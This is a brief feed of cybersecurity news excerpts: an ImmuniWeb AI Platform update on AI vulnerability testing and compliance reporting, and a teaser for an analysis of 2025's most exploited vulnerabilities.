ImmuniWeb has unveiled a major update to its ImmuniWeb AI Platform, based on ongoing research as well as valuable feedback from customers and partners in over 50 countries. This cumulative Q4 update builds on the Q3 update announced in early October. Most Q4 improvements focus on security testing for AI-specific vulnerabilities and weaknesses in web and mobile applications, as well as enhanced testing and reporting for regulatory and compliance purposes. The update also combines detection …
The post ImmuniWeb enhances AI vulnerability testing and compliance reporting appeared first on Help Net Security.
Does your sysadmin hate you? We explain how information security can stop being a "brake" on progress.
Top 20 Most Exploited Vulnerabilities of 2025: A Comprehensive Analysis
The cybersecurity landscape of 2025 has been marked by an unprecedented surge in vulnerability exploitation, with threat actors leveraging critical flaws across enterprise software, cloud infrastructure, and industrial systems. This comprehensive analysis examines the twenty most dangerous exploited vulnerabilities of the year, highlighting their technical details, exploitation methods, and the urgent need for organizations to […]
The post Top 20 Most Exploited Vulnerabilities of 2025: A Comprehensive Analysis appeared first on Cyber Security News.